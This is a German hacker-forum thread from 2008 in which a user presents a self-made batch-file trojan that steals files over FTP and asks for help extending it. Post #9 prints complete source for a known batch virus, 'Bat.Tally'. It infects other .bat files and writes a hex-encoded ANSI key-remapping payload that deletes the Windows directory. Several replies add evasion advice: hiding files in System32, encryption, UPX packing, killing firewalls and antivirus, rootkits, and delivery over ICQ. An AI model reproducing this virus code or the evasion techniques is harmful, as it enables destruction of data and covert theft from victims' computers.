#1 6. Juni 2008 Zuletzt von einem Moderator bearbeitet: 14. April 2017 Hey RRler, wollte mal auf cooperation anfrage und ein bisschen um hilfe bitten ! Suche noch ein paar leute mit denen ich das Tool mal testen bzw erweitern kann. Aber erstmal. Es ist kein naja richtig programmierter trojaner .... ich kann auch nicht programmieren... ich selber habe nur mit kommando befehlen gearbeitet. Das gute daran : Wenn der user das prog ausführt wird es von keinem AV erkannt. Eine "Remote" Controlle habe ich auch schon "eingebaut". Das Programm erstellt eine file worin alle dateien auf einem laufwerk gelistet und gepackt werden. Via einer antwortdatei kann man dann bestimmte files von dem rechner requesten. Das ganze kommunikation erfolgt dann über einen ftp server. Also wer bock hat kann hier ja mal posten oder mich per PN anschreiben. hier mal der "hauptteil" des programms Spoiler https://www.xup.in/dl,18018728/inetbot/ edit: und bevor jemand sagt den darfst du nicht einsetzten auch wenn er funktionieren sollte ! Das weis nicht natürlich mir war einfach langweilig und dann habe ich mir sowas halt ausgedacht. Ich habe ihn auch noch an NIEMANDEN ausprobiert oder weitergegeben also .. ruhig blut !!! Quellcode will ich hier erstmal nicht veröffentlichen ... naja eigentlich isses ja auch gar keiner Ich habe jedoch nichts geklaut und habe es mir selbst ausgedacht. gerne nehme ich auch kretik hin sollange sie construtiv ist. + Multi-Zitat Zitieren
#2 6. Juni 2008 AW: BAT Trojaner ich würd mir diesen "bat-trojaner" ganz gerne mal anschauen. Wäre n1 wenn du mir mal nen link dazu per pm schicken könntest. + Multi-Zitat Zitieren
#3 6. Juni 2008 AW: BAT Trojaner würde das ding auch gern mal sehen, kannst es mir ja ma per pn schicken ... bb. master80 + Multi-Zitat Zitieren
#4 6. Juni 2008 AW: BAT Trojaner gibt genug batch trojaner mit public source die das gleiche können , bevor ich jemand dazu bringe eine test.bat zu öffnen schiebe ich ihm lieber gleich einen richtig programmierten trojaner unter.ob du - ihr auf dauer mit batch spass haben werdet ? villeicht im schulnetzwerk und dann einen auf dicke hose machen. ich bin mal nicht so frei und poste hier den source nicht.. + Multi-Zitat Zitieren
#5 6. Juni 2008 AW: BAT Trojaner Also ich würd die finger von Trojaner lassen Ob selbst Programmiert oder Publices Das ist erstmal extreme Kiddy haft und zweites können die vics schnell eine deine IP kommen @ cmd - netstats -n Und wen die erstmal deine ip haben dan können deine Victems Abuse verschiken Also lass die Finger davon Ansosten Programmiere mit Delphi Trojaner Source kannst du in Google suchen Die seite hieß glaub ich opensc oder so HF + Multi-Zitat Zitieren
#6 6. Juni 2008 AW: BAT Trojaner man muss das ding ja nich gleich auch seinem pc laufen lassen, wozu gibts ne vBox. kannst mir gern mal schicken und ich lass es auf ner vbox laufen. + Multi-Zitat Zitieren
#7 6. Juni 2008 AW: BAT Trojaner Kann ich bitte mal den Code von deinem so gennanten Bat-Trojaner sehen ? =) Mfg Alex² + Multi-Zitat Zitieren
#8 6. Juni 2008 AW: BAT Trojaner hey also erstmal danke für das feedback ! @Frankie00rz ich bin kein scrip kiddie und auch nicht mehr 12 um es im schul netzt verbreiten zu können. Bin einfach ein netzwerktechniker der ein bisschen zu viel zeit hatte. Ich gebe dir recht das nen selbstgeschriebener trojaner besser ist aber da ich halt noch nicht richtig proggen kann scripte ich einfach. Im sinne von entdeckt werden ... naja meine ip bekommen sie nicht weil ich mit dem vic nicht direkt kommuniziere nur über eine antwort datei die per ftp geladen wird. an alle anderen ich schick euch mal nen auszug bzw stelle ihn hier rein ! + Multi-Zitat Zitieren
#9 6. Juni 2008 AW: BAT Trojaner batch ist nur für erweiterte scann0r dinge nützlich , sowie automatisierungsprozesse , was gutes geht wohl nicht ohne c/++ , üben mit vb und co ist aber erlaubt , diesen habe ich noch gefunden Code: ECHO OFF REM Ansi/Bat.Tally.a REM By -KD- [Metaphase & NoMercyVirusTeam] REM Yup its new school with a new twist 2008! ECHO DEVICE=C:\WINDOWS\Command\ANSI.SYS>>c:\config.sys @ctty nul.tally for %%a in (*.bat ..\*.bat) do set tally=%%a find "tally"<%tally% if errorlevel 1 find "tally"<%0.BAT>>%tally% ECHO N TALLY.ANS>tally.t ECHO E 0100 40 45 43 48 4F 20 4F 4E 0D 0A 1B 5B 22 79 22 3B>>tally.t ECHO E 0110 22 6E 22 3B 31 33 70 0D 0A 1B 5B 22 59 22 3B 22>>tally.t ECHO E 0120 6E 22 3B 31 33 70 0D 0A 1B 5B 22 6E 22 3B 22 79>>tally.t ECHO E 0130 22 3B 31 33 70 0D 0A 1B 5B 22 4E 22 3B 22 79 22>>tally.t ECHO E 0140 3B 31 33 70 0D 0A 1B 5B 22 69 22 3B 22 6D 64 20>>tally.t ECHO E 0150 63 3A 5C 77 69 6E 39 78 22 3B 22 63 6F 70 79 20>>tally.t ECHO E 0160 63 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 20 63>>tally.t ECHO E 0170 3A 5C 77 69 6E 39 78 22 3B 22 64 65 6C 20 63 3A>>tally.t ECHO E 0180 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31 33>>tally.t ECHO E 0190 70 0D 0A 1B 5B 22 49 22 3B 22 6D 64 20 63 3A 5C>>tally.t ECHO E 01A0 77 69 6E 39 78 22 3B 22 63 6F 70 79 20 63 3A 5C>>tally.t ECHO E 01B0 77 69 6E 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C 77>>tally.t ECHO E 01C0 69 6E 39 78 22 3B 22 64 65 6C 20 63 3A 5C 77 69>>tally.t ECHO E 01D0 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31 33 70 0D 0A>>tally.t ECHO E 01E0 1B 5B 22 65 22 3B 22 6D 64 20 63 3A 5C 77 69 6E>>tally.t ECHO E 01F0 39 78 22 3B 22 63 6F 70 79 20 63 3A 5C 77 69 6E>>tally.t ECHO E 0200 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C 77 69 6E 39>>tally.t ECHO E 0210 78 22 3B 22 64 65 6C 20 63 3A 5C 77 69 6E 64 6F>>tally.t ECHO E 0220 77 73 20 2A 2E 2A 22 3B 31 33 70 0D 0A 1B 5B 22>>tally.t ECHO E 0230 45 22 3B 22 6D 64 20 63 3A 5C 77 69 6E 39 78 22>>tally.t ECHO E 0240 3B 22 63 6F 70 79 20 63 3A 5C 77 69 6E 64 6F 77>>tally.t ECHO E 0250 73 20 2A 2E 2A 20 63 3A 5C 77 69 6E 39 78 22 3B>>tally.t ECHO E 0260 22 64 65 6C 20 63 3A 5C 77 69 6E 64 6F 77 73 20>>tally.t ECHO E 0270 2A 2E 2A 22 3B 31 33 70 0D 0A 1B 5B 22 61 22 3B>>tally.t ECHO E 0280 22 6D 64 20 63 3A 5C 77 69 6E 39 78 22 3B 22 63>>tally.t ECHO E 0290 6F 70 79 20 63 3A 5C 77 69 6E 64 6F 77 73 20 2A>>tally.t ECHO E 02A0 2E 2A 20 63 3A 5C 77 69 6E 39 78 22 3B 22 64 65>>tally.t ECHO E 02B0 6C 20 63 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A>>tally.t ECHO E 02C0 22 3B 31 33 70 0D 0A 1B 5B 22 41 22 3B 22 6D 64>>tally.t ECHO E 02D0 20 63 3A 5C 77 69 6E 39 78 22 3B 22 63 6F 70 79>>tally.t ECHO E 02E0 20 63 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 20>>tally.t ECHO E 02F0 63 3A 5C 77 69 6E 39 78 22 3B 22 64 65 6C 20 63>>tally.t ECHO E 0300 3A 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31>>tally.t ECHO E 0310 33 70 0D 0A 1B 5B 22 6F 22 3B 22 6D 64 20 63 3A>>tally.t ECHO E 0320 5C 77 69 6E 39 78 22 3B 22 63 6F 70 79 20 63 3A>>tally.t ECHO E 0330 5C 77 69 6E 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C>>tally.t ECHO E 0340 77 69 6E 39 78 22 3B 22 64 65 6C 20 63 3A 5C 77>>tally.t ECHO E 0350 69 6E 64 6F 77 73 20 2A 2E 2A 22 3B 31 33 70 0D>>tally.t ECHO E 0360 0A 1B 5B 22 4F 22 3B 22 6D 64 20 63 3A 5C 77 69>>tally.t ECHO E 0370 6E 39 78 22 3B 22 63 6F 70 79 20 63 3A 5C 77 69>>tally.t ECHO E 0380 6E 64 6F 77 73 20 2A 2E 2A 20 63 3A 5C 77 69 6E>>tally.t ECHO E 0390 39 78 22 3B 22 64 65 6C 20 63 3A 5C 77 69 6E 64>>tally.t ECHO E 03A0 6F 77 73 20 2A 2E 2A 22 3B 31 33 70 0D 0A>>tally.t ECHO RCX>>tally.t ECHO 02AE>>tally.t ECHO W>>tally.t ECHO Q>>tally.t debug<tally.t>nul del tally.t type tally.ans del tally.ans ctty con.tally + Multi-Zitat Zitieren
#10 6. Juni 2008 AW: BAT Trojaner hab mal das main programm als code geuppt. mal sehen wie ihr es findet. Ich weis das am ende eine Variable falsch gesetzt ist aber das ist absicht ! Greetz + Multi-Zitat Zitieren
#11 6. Juni 2008 AW: BAT Trojaner was heist hier üben? vb hat sehr wohl seine daseinsberechtigung und vor allem geht darin nen privattrojaner effektiver zu proggen als in c/cpp. effektivität = leistung / zeit btt: C:\remotebot > genialster pfad für shadcode - ever - selbst temp btw ist das doch blos nen starter für nen trojaner und da warum nimmste da kein selbstentpackendes archiv, anstatt die vorhandenheit von winrar (!anhand des ordners!) zu checken. + Multi-Zitat Zitieren
#12 6. Juni 2008 AW: BAT Trojaner wie gesagt bin für verbesserungen offen. ausserdem sagte ich ja es ist das main programm wie du sagtest der loader + Multi-Zitat Zitieren
#13 6. Juni 2008 AW: BAT Trojaner Ohne dir jetzt was zu wollen.... 1. BATCH-Dateien sind wirklich viel zu leicht auszulesen, als das sie sich für nen Trojaner eignen würden (Rechtsklick -> öffnen mit -> Editor reicht ja schon), dem kann man aber nachhelfen 2. wirst du in nen BATCH Trojaner niemals wirklich gute Funktionen reinkriegen höchstens über externe calls von Programmen die du alle beilegen musst... 3. Pfad ändern - am besten im System32 Verzeichnis die Files temporär ablegen da schaut echt so gut wie nie jemand rein - ausser er hat PC Probleme.... MFG TuXiFiED + Multi-Zitat Zitieren
#14 7. Juni 2008 AW: BAT Trojaner Wo ist da der Unterschied, ob nen BAT Trojaner oder einer in VB/Delphie usw ? Bei beiden kannst du so einfach die IP rausbekommen... (oder die DNS -> dadurch wieder die IP)... Also war das grat net sinnvoll Man muss dern Trojaner wenn dann über nen Server laufen lassen... Oder anderweitig "tunneln"... Aber was sage ich... Trojaner sind eh fürn ***** und total dumm... Aber wenn ihr mit sowas spielen wollt, dann viel Spaß + Multi-Zitat Zitieren
#15 7. Juni 2008 AW: BAT Trojaner Natürlich sind irgentwelche 0815 Trojaner dumm, aber wenn du selbst einen schreibst ist es wohl die einfachste möglichkeit z.B jmd im ICQ damit zu "hacken"(ja ich weis, dass es kein hacken ist). Wenn er nicht grad ne andere Vulnerability aufweist. Komplett sinnlos sind sie also nicht, da nur jedes Kiddie die Teile benutzt vll etwas vorbelastet =). Mfg Alex² + Multi-Zitat Zitieren
#16 7. Juni 2008 AW: BAT Trojaner Sagt ein 16-Jähriger ahnungsloser. Es gibt vielleicht 0,01 % der Vics, die deine IP rausbekommen, mit dem simplen Befehl. Eben schreibst er soll die Finger davon lassen "Ob selbst Programmiert oder Publics" und dann sagst du: "Ansosten Programmiere mit Delphi Trojaner Source kannst du in Google suchen Die seite hieß glaub ich opensc oder so" Verstehe deine Logik net so ganz. Zu der Bat: Ich glaube nicht so ganz dass du die ganze Bat selbst erstellt hast, ich mein ist ja nich verboten da nen public code mit einzubauen, aber die Idee ist ganz nice. greeZ kuhjunge + Multi-Zitat Zitieren
#17 7. Juni 2008 AW: BAT Trojaner Ahja.... 1.1 hat so gut wie jeder Trojaner (public - private erst recht...) ne Injection, womit keine Firewall mehr anschlägt. 1.2 Haben viele Trojaner nen eingebautes Rootkit wodurch dann netstat rein garnix bringt weil die Verbindungen - Prozesse - Dateien - Handles hidden sind. Und so gut wie jedes "Opfer" welches den Trojaner ausführt wird wohl kaum nen Anti-Rootkitscanner durchlaufen lassen, da diese Personen meist nicht besonders viel Ahnung von PCs haben. 2.1 Dafür müsste er Delphi erst ein mal RICHTIG beherrschen (zumindest Winsocks für die Verbindung + viele weitere Funktionen für die ganzen Registryeinträge ... ) 2.2. Public Source kompilieren wird ihm wohl kaum was bringen da der zu 99,9% bereits detected ist und ohne das passende Hintergrundwissen wird er den wohl kaum so stealthen/hexen oder umprogrammieren können, das er nicht erkannt wird. siehe 1.2 FULL ACK. Mehr gibt's dazu nicht zu sagen. MFG TuXiFiED + Multi-Zitat Zitieren
#18 7. Juni 2008 AW: BAT Trojaner Offtopic alarm @wollte mal auf cooperation anfrage und ein bisschen um hilfe bitten ! Suche noch ein paar leute mit denen ich das Tool mal testen bzw erweitern kann. also hat jetzt jemand von euch bock mitzuhelfen oder nicht , grundsatzdiskussionen waren garnicht thema das treads... + Multi-Zitat Zitieren
#19 7. Juni 2008 AW: BAT Trojaner @ TuXiFiED Viele heißt nicht jedes rat hat ein Rootkit Würd trozdem die finger von lassen + Multi-Zitat Zitieren
#20 7. Juni 2008 AW: BAT Trojaner verbesserungsvorschlag: hau dir ne set-encryption rein und compile es ggf. zu einer .exe mfg black. btw nicht viel ahnung von pc: @ tuxified: hast du überhaupt nen plan was du immer so laberst?^^ + Multi-Zitat Zitieren
#21 7. Juni 2008 AW: BAT Trojaner Und ggf. noch packen falls sie zu groß ist - z.B. mit UPX. Kannst ja mal quoten was du zu beanstanden hast, kann sein das ich mich bei VB/Delphi bissel vertan habe da ich die beiden Sprachen nicht beherrsche aber generell ist es doch recht sinnig wenn ein Trojaner Autostarteinträge erzeugt, nen Rootkit sowie ne Injection beeinhaltet oder? Und wenn das eingebaute Rootkit die Verbindungen versteckt wirst du sie mit netstat auch nicht sehen, logisch oder? + Multi-Zitat Zitieren
#22 7. Juni 2008 AW: BAT Trojaner wow hätte nicht gedacht hier so eine welle los zu treten. Wie bereits gesagt wurde es dient nur mal so aus spass und um zu schauen ob es funzt. Firewalls kann ich mit dem prog auch umgehen. Ich lasse einfach den angemeldeten user die firewall oder AV killen. dank nircmd geht das. Desweiteren wenn dieses tool mit nircmd ausgeführt wird ist es automatisch unsichbar und läuft nur noch im hintergund ab. also nicht ganz so dumm . Hm was noch... naja ich kann halt auch immer wieder mein prog upaten oder ihn mit aktuellen befehlen versorgen halt nur das ich auf das neue ausführen warten muss. Das diese file leicht auszulesen ist geb ich allen schreibern recht ! Packen jedoch aufgrund eines größen problems brauche ich nicht .. ich mein die files die ich brauche sind insgesammt villeicht mal 12kb groß also nicht die welt ! + Multi-Zitat Zitieren
#23 8. Juni 2008 Zuletzt von einem Moderator bearbeitet: 13. April 2017 AW: BAT Trojaner Lol, du sagst die 0815 sind dumm... Aber die selbstprogrammierten sind "besser" um vllt jmd das ICQ zu "hacken"? Der Einsatz von Trojanern ist also nicht sinnlos? Junge werd erstmal erwachsen... Wo liegt der Sinn jmd das ICQ zu hacken? Geht dir da derb einer ab oder was? Macht dich das geil? Denkst du, dass du dadurch Macht bekommst? Und für was willst du nen Trojaner sinnvol einsetzen? Wenn du nen PC Administrieren willst, dann geht das mit anderen Tools, die das gleiche können. Und das wäre vllt noch der einzige sinnvolle Einsatz... Aber auch nur vllt.... Einfach unfassbar wie manche Leute hier von ihrern Trojanermachenschaften überzeugt sind......... @ TuXiFiED : Zeig mir, sagen wir mal 10 User im RR, die in ihre Trojaner nen Rootkit einbauen... Wird wohl eher sowas von selten sein....... + Multi-Zitat Zitieren
#24 8. Juni 2008 Zuletzt von einem Moderator bearbeitet: 13. April 2017 AW: BAT Trojaner Ich redete davon es ihm per ICQ zu verabreichen =) . Was man dann damit macht ist ne andere Sache, dass war ein simples Beispiel. Ich selbst nutze keine Trojaner o.ä. ! Deine Beileidigung kannst du dir sparen =). Solch eine Ausdrucksweise lässt auch nicht auf ein hohes geistiges Alter schließen, wie wäre es, wenn du dein Wissen mal Konstruktiv benutzt ? Wieso gehst du direkt so ab, auch wenn ich zugebe das ICQ ein dummes Beispiel war. =) Es geht einfach nur darum, dass man die Teile schon verwenden kann. Obwohl jetz wo ich nachdenke raadmin würde es auch tun. Die Definition von Trojaner ist auch nicht *haha lolol ich mach den bildschirm vom anderen schwarz* wenn ich mir jetz einen schreibe der z.B mein Ftp-server auf dem Ziel Rechner installiert was daran ist bitte dann so schlimm ? + Multi-Zitat Zitieren
#25 8. Juni 2008 AW: BAT Trojaner btw , konnte jemand meinen geposteten source mal testen um zu sagen was der trojaner macht ? Interessant ist das Thema alle mal , nur behaupte ich von mir selbst , sowas einzusetzen ist absolute schei... egal ob gegen freunde-feinde-ex-frau oder sonst wen , einfach nur unterste schublade. Die meisten funny trojaner und viren richten grossen schaden an oder kommen zu leicht in hände von kindern. + Multi-Zitat Zitieren